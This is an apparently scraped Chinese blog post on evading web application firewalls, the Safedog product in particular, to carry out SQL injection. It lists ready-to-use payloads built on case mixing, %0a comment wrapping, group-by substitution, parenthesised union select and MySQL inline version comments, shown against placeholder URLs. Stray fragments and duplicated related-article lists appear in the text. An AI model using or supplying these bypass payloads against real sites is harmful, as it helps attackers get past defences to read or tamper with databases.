繞WAF&安全狗新姿式
俗話說只要思路寬,繞狗繞的歡。前段時間我有嘗試着用如下的方法繞狗,效果還不錯。不過這方法呢也許這段時間能夠繞過,過段時間可能就失效了,你們仍是要多去嘗試找到更多的方法。php
舉例-->整型注入 繞過WAF安全
繞過方法:編碼
- 就是修改大小寫 加%0a 或%0d去繞過(%0a是換行,%0d是回車) 如: and 1=1 可能會被過濾可改成 /*%0Aand%0a*/ 1=1 或 and 'a' in('a','b') 或 /*%0AaNd%0A*/ 1=1
- Order by 7 可改成 group by 7 或group by (7)去繞過
- 加括號去嘗試 id=-1 union select 1,2,3 可改成 id=-1 union (((select (1),2,3)))
加+ - ! @ 去嘗試 id=-1 union select +或者@或者!或者- 1,2,3url
加%0a換行) id=-1 union %0a select %0a 1,2,3
spa
繞過安全狗:io
- And 可用 url編碼%26表示
- 加內聯 和數字去繞過 如:http://www.xxx.com/union.php?id=-1 /*!union/*!44322/*!22322select*/ 1,2,3,4
- 每一個詞前加它/*%!a*/ 就是干擾 如:http://www.xxx.com/union.php?id=-1 union/*%!a*/select/*%!a*/1,2,3,4
相關文章
- 1. 繞過WAF、安全狗知識整理
- 2. XSS繞過WAF的姿式
- 3. 繞過安全狗
- 4. sql注入100種姿勢過waf(二):過安全狗
- 5. Sql注入waf過濾機制及繞過姿式
- 6. SQL注入繞過waf的一萬種姿式
- 7. 輕鬆繞各種WAF的POST注入、跨站防禦(比如安全狗)
- 8. 輕鬆繞各類WAF的POST注入、跨站防護(好比安全狗)
- 9. waf繞過
- 10. WAF繞過
- 更多相關文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • C# 不安全代碼 - C#教程
- • IntelliJ IDEA安裝代碼格式化插件
- • Composer 安裝與使用
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 繞過WAF、安全狗知識整理
- 2. XSS繞過WAF的姿式
- 3. 繞過安全狗
- 4. sql注入100種姿勢過waf(二):過安全狗
- 5. Sql注入waf過濾機制及繞過姿式
- 6. SQL注入繞過waf的一萬種姿式
- 7. 輕鬆繞各種WAF的POST注入、跨站防禦(比如安全狗)
- 8. 輕鬆繞各類WAF的POST注入、跨站防護(好比安全狗)
- 9. waf繞過
- 10. WAF繞過